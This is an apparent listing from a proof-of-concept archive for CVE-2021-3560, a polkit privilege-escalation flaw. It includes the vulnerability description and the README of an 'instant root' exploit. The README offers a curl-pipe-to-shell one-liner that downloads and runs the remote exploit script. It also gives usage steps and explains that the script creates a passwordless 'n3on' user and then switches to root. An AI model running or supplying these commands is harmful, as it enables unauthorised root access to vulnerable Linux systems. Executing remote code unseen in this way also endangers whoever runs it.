Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-3560 PoC — polkit 代码问题漏洞

Source
Associated Vulnerability
Title:polkit 代码问题漏洞 (CVE-2021-3560)
Description:It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Description
Polkit Exploit (CVE-2021-3560), no download capabilty? Copy and paste it!
Readme
# CVE-2021-3560
Polkit Instant Root Exploit

You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in:

> sh -c "$(curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh)"

Or you can download the .sh or copy and paste it. Run and Instant Root. User created is named 'n3on' with no password, script then switches to root.

<h1>Usage:</h1>
>git clone https://github.com/n3onhacks/CVE-2021-3560.git<br>
>chmod -R CVE-2021-3560<br>
>cd CVE-2021-3560<br>
>./polkit.sh<br><p>

  <i>*If you are not automatically root, type in 'sudo -s' to be root (See video).</i>

<h2>POC Video:</h2>
https://www.youtube.com/watch?v=UWfuoeTeTtU<p>
File Snapshot

[4.0K] /data/pocs/a0a685b47fc771912a61c4251434db7c23295c21 ├── [2.0K] polkit.sh └── [ 686] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →